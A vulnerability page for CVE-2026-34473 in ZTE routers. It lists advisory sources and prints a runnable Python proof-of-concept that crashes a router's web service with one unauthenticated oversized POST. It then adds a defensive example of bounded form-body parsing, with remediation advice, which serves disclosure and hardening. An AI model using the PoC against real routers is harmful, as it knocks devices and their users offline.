| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2026-34473 | 6 May 2026 00:00 | – | attackerkb |
| CVE-2026-34473 | 27 Mar 2026 23:26 | – | circl |
| Resource management error vulnerability in multiple ZTE products | 6 May 2026 00:00 | – | cnnvd |
| CVE-2026-34473 | 6 May 2026 00:00 | – | cve |
| CVE-2026-34473 | 6 May 2026 00:00 | – | cvelist |
| EUVD-2026-27881 | 6 May 2026 21:31 | – | euvd |
| CVE-2026-34473 | 6 May 2026 19:16 | – | nvd |
| ZTE Unauthenticated Denial of Service | 20 May 2026 00:00 | – | packetstorm |
| ZTE ZXHN Router Denial of Service | 26 May 2026 00:00 | – | packetstorm |
| PT-2026-38217 | 6 May 2026 00:00 | – | ptsecurity |
```python
# Exploit Title: ZTE Routers - Unauthenticated Denial of Service
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link: https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
# Version: Multiple ZTE router models (17+ confirmed)
# Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed devices
# CVE: CVE-2026-34473
# Description:
# The CGILua post.lua parser in 17+ ZTE router models does not enforce a
# maximum body size for application/x-www-form-urlencoded POST requests.
# An unauthenticated attacker can crash or freeze the router's web service
# by sending a single oversized POST request to any CGI endpoint.
# No authentication, session, or credentials are required.
#
# Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide.
# Estimated 140,000+ publicly reachable devices at time of research.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473

# PoC (Python 3)
import sys

import requests


def dos_exploit(target, size_kb=256):
    """
    CVE-2026-34473 - Unauthenticated DoS
    Sends oversized POST body to crash ZTE CGILua web service.
    """
    url = f"http://{target}/cgi-bin/luci"
    # One urlencoded field whose value is size_kb KiB of filler; post.lua
    # buffers the whole body because it applies no upper bound.
    payload = "a=" + "A" * (size_kb * 1024)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=15)
        print(f"[+] {target} responded with HTTP {r.status_code} "
              f"(device may still be up)")
    except requests.exceptions.ConnectionError:
        # A dropped connection is also what a filtering device or a reset
        # from an upstream proxy produces; re-probe the web UI to confirm.
        print(f"[!] {target} - Connection refused or dropped: device web "
              f"service likely crashed (DoS successful)")
    except requests.exceptions.Timeout:
        print(f"[!] {target} - Timeout: device web service unresponsive "
              f"(DoS successful)")
    except Exception as e:
        print(f"[-] {target}: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: poc.py <target_ip> [payload_size_kb]")
        sys.exit(1)
    size = int(sys.argv[2]) if len(sys.argv) > 2 else 256
    dos_exploit(sys.argv[1], size)
```
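The root cause the advisory describes is a form parser that buffers a urlencoded body of whatever size the client declares. The following is an added example, not code from the exploit, the advisory or ZTE firmware, written in Python so it runs beside the PoC: a minimal urlencoded body reader in the unbounded form the advisory describes, next to a bounded form that refuses an oversized declared Content-Length before reading a single body byte and, when no length is declared, reads at most one byte past the cap. `MAX_FORM_BODY`, the `CountingReader` harness and the sample requests are assumptions constructed here; the 256 KiB body mirrors the shape of the PoC payload.

```python
"""
Bounded vs. unbounded handling of application/x-www-form-urlencoded bodies.

Added example, not code from the exploit, the advisory or ZTE firmware.
parse_form_unbounded() mirrors the flaw the advisory describes (buffer
whatever the client declares); parse_form_bounded() caps the body before
and during the read. MAX_FORM_BODY and the sample requests are assumptions.
"""
import io
from urllib.parse import parse_qs

MAX_FORM_BODY = 16 * 1024   # assumed cap for a CPE admin form; tune per device


class RejectedBody(Exception):
    """Request refused before the form is parsed; status is the HTTP code to send."""

    def __init__(self, status: int, reason: str):
        super().__init__(reason)
        self.status = status


class CountingReader:
    """Constructed stand-in for a request stream that records bytes actually read."""

    def __init__(self, data: bytes):
        self._buf = io.BytesIO(data)
        self.bytes_read = 0

    def read(self, n: int = -1) -> bytes:
        chunk = self._buf.read(n)
        self.bytes_read += len(chunk)
        return chunk


def parse_form_unbounded(rfile, headers: dict) -> dict:
    """Vulnerable pattern: trust Content-Length and buffer the whole body.

    One request with a multi-megabyte body is read fully into memory; on a
    memory-constrained router this is the condition the advisory describes.
    """
    length = int(headers.get("Content-Length", "0"))
    body = rfile.read(length)
    return parse_qs(body.decode("latin-1"), keep_blank_values=True)


def parse_form_bounded(rfile, headers: dict, max_body: int = MAX_FORM_BODY) -> dict:
    """Hardened pattern: enforce the cap before reading and while reading.

    1. A declared Content-Length above the cap is refused with 413 without
       reading a single body byte.
    2. With no Content-Length (e.g. chunked encoding decoded upstream), read
       at most one byte past the cap; if that byte arrives, refuse with 413.
    """
    declared = headers.get("Content-Length")
    if declared is not None:
        try:
            length = int(declared)
        except ValueError:
            raise RejectedBody(400, "unparseable Content-Length") from None
        if length < 0 or length > max_body:
            raise RejectedBody(413, f"declared {length} bytes > cap {max_body}")
        body = rfile.read(length)
    else:
        body = rfile.read(max_body + 1)
        if len(body) > max_body:
            raise RejectedBody(413, f"body exceeds cap {max_body}")
    return parse_qs(body.decode("latin-1"), keep_blank_values=True)


def run_case(parser, data: bytes, headers: dict) -> tuple:
    """Run one parser over a constructed request.

    Returns ("ok", fields, bytes_read) or ("rejected", http_status, bytes_read).
    """
    rfile = CountingReader(data)
    try:
        fields = parser(rfile, headers)
    except RejectedBody as exc:
        return ("rejected", exc.status, rfile.bytes_read)
    return ("ok", fields, rfile.bytes_read)


def demo() -> dict:
    """Both parsers against a PoC-shaped body and a normal login form (constructed)."""
    big = b"a=" + b"A" * (256 * 1024)        # same shape as the PoC payload
    small = b"user=admin&x="
    declared_big = {"Content-Length": str(len(big))}
    return {
        "unbounded_declared": run_case(parse_form_unbounded, big, declared_big),
        "bounded_declared": run_case(parse_form_bounded, big, declared_big),
        "bounded_undeclared": run_case(parse_form_bounded, big, {}),
        "bounded_small": run_case(parse_form_bounded, small,
                                  {"Content-Length": str(len(small))}),
    }


if __name__ == "__main__":
    for name, (status, detail, n) in demo().items():
        summary = detail if status == "rejected" else f"{len(detail)} field(s)"
        print(f"{name:20s} {status:8s} read={n:7d} {summary}")
```

The two-step check is the part worth carrying over to a real fix, whether it lands in post.lua or in the front web server: refuse on the declared length first, then still bound the actual read, because a client can under-declare or omit Content-Length. Note that `urllib.parse.parse_qs` has its own `max_num_fields` guard, but that caps the number of fields, not the bytes in a single value, so a byte cap on the body is still required.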